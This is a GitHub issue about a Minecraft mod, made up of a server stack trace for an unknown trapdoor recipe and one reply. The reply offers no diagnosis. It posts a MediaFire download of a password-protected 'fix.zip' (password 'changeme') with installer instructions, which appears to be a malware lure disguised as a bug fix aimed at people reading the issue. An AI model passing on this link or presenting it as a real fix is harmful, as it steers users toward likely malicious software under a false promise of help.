### ISSUE TITLE
error abot trapdoor recipe

### ISSUE THREAD

**Issue by wangyu2333333** [thedarkcolour/Future-MC#374]
[18:21:23] [Server thread/ERROR] [minecraft/AdvancementManager]: Parsing error loading built-in advancement minecraft:recipes/redstone/trapdoor
com.google.gson.JsonSyntaxException: Unknown recipe 'minecraft:trapdoor'
        at net.minecraft.advancements.AdvancementRewards$Deserializer.deserialize(AdvancementRewards.java:183) ~[l$a.class:?]
        at net.minecraft.advancements.AdvancementRewards$Deserializer.deserialize(AdvancementRewards.java:159) ~[l$a.class:?]
        at com.google.gson.internal.bind.TreeTypeAdapter.read(TreeTypeAdapter.java:76) ~[gson-2.10.1.jar:?]
        at com.google.gson.Gson.fromJson(Gson.java:1227) ~[gson-2.10.1.jar:?]
        at com.google.gson.Gson.fromJson(Gson.java:1329) ~[gson-2.10.1.jar:?]
        at com.google.gson.Gson.fromJson(Gson.java:1300) ~[gson-2.10.1.jar:?]
        at com.google.gson.internal.bind.TreeTypeAdapter$GsonContextImpl.deserialize(TreeTypeAdapter.java:179) ~[gson-2.10.1.jar:?]
        at net.minecraft.util.JsonUtils.func_188179_a(SourceFile:439) ~[rc.class:?]
        at net.minecraft.util.JsonUtils.func_188177_a(SourceFile:455) ~[rc.class:?]
        at net.minecraft.advancements.Advancement$Builder.func_192059_a(Advancement.java:283) ~[i$a.class:?]
        at net.minecraft.advancements.AdvancementManager$1.deserialize(AdvancementManager.java:50) ~[ns$1.class:?]
        at net.minecraft.advancements.AdvancementManager$1.deserialize(AdvancementManager.java:46) ~[ns$1.class:?]
        at com.google.gson.internal.bind.TreeTypeAdapter.read(TreeTypeAdapter.java:76) ~[gson-2.10.1.jar:?]
        at net.minecraft.util.JsonUtils.func_188173_a(SourceFile:492) ~[rc.class:?]
        at net.minecraft.util.JsonUtils.func_193839_a(SourceFile:532) ~[rc.class:?]
        at net.minecraft.advancements.AdvancementManager.func_192777_a(AdvancementManager.java:189) ~[ns.class:?]
        at net.minecraft.advancements.AdvancementManager.func_192779_a(AdvancementManager.java:68) ~[ns.class:?]
        at net.minecraft.advancements.AdvancementManager.<init>(AdvancementManager.java:60) ~[ns.class:?]
        at net.minecraft.world.WorldServer.func_175643_b(WorldServer.java:222) ~[oo.class:?]
        at net.minecraft.server.MinecraftServer.func_71247_a(MinecraftServer.java:354) ~[MinecraftServer.class:?]
        at net.minecraft.server.dedicated.DedicatedServer.func_71197_b(DedicatedServer.java:330) ~[nz.class:?]
        at net.minecraft.server.MinecraftServer.run(MinecraftServer.java:640) ~[MinecraftServer.class:?]
        at java.base/java.lang.Thread.run(Thread.java:1583) [?:?]

**Comment by llowvxe** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
